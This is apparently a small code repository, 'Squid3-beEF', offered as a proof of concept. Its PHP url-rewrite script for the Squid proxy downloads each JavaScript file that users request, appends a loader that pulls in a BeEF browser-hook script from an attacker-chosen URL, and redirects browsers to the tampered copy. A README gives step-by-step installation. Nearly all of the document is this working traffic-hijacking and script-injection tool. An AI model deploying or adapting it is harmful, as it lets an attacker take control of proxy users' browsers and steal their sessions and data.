├── payload.js
├── rewrite.php
├── README.md
└── LICENSE


/payload.js:
--------------------------------------------------------------------------------
1 | (function () { var url = '#__BEEFURL__#';if (typeof beef == 'undefined') { var bf = document.createElement('script'); bf.type = 'text/javascript'; bf.src = url; document.body.appendChild(bf);}})();


--------------------------------------------------------------------------------
/rewrite.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env php
 2 | <?php
 3 | stream_set_timeout(STDIN, 86400);
 4 | 
 5 | while ( $stdin = fgets(STDIN) ) {
 6 | 	$pecah = explode(' ', $stdin);
 7 | 	$url = trim($pecah[0]);
 8 | 	if( isJS( $url ) AND (stripos( $url, 'hook.js' ) === false)) {
 9 | 		$file = dirname(__FILE__) . '/payload/' . md5( $url ) . '.js';
10 | 		if( !file_exists( $file ) ) {
11 | 			exec( "wget " . escapeshellarg( $url ) . " -O " . escapeshellarg( $file ));
12 | 			exec( "cat " . escapeshellarg( dirname(__FILE__) . "/payload.js" ) . " >> " . escapeshellarg( $file ));
13 | 		}
14 | 		$url = "301:http://localhost/payload/" . md5( $url ) . ".js";
15 | 	}
16 | 	printf("%s\n", $url);
17 | }
18 | 
19 | function isJS($url) {
20 | 	$url = parse_url( $url );
21 | 	if( !isset( $url['path'] ) ) {
22 | 		return false;
23 | 	}
24 | 	return (bool) ( strtolower( end( explode('.', $url['path']) ) ) === 'js' ); // one-liner hack
25 | }


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Squid3-beEF
 2 | Proof of Concept - Using [squid](http://www.squid-cache.org/) url rewrite feature to "hijack" proxy traffic and inject [BeEF](http://beefproject.com/) payload into it.
 3 | 
 4 | # Requirement
 5 | - PHP 5.3
 6 | - Apache
 7 | - mod_php
 8 | - [Squid3](http://www.squid-cache.org/)
 9 | - [BeEF](http://beefproject.com/)
10 | 
11 | # Installation
12 | 1. Copy rewrite.php and payload.js to apache document root 
13 | 2. Make rewrite.php executable by using following command
14 |     - chmod +x <document root>/rewrite.php
15 | 3. Edit /etc/squid3/squid.conf and add following line
16 |     - url_rewrite_program <document root>/rewrite.php
17 | 4. Change #\__BEEFURL__# inside payload.js to BeEF Hook URL
18 | 5. Create empty folder and allow writable by all user
19 |     - mkdir -p <document root>/payload
20 |     - chmod 0777 <document root>/payload
21 | 
22 | Be sure to restart squid3 (sudo service squid3 restart) to refresh the changes.


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2015 Ramadhan Amizudin
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 
23 | 


--------------------------------------------------------------------------------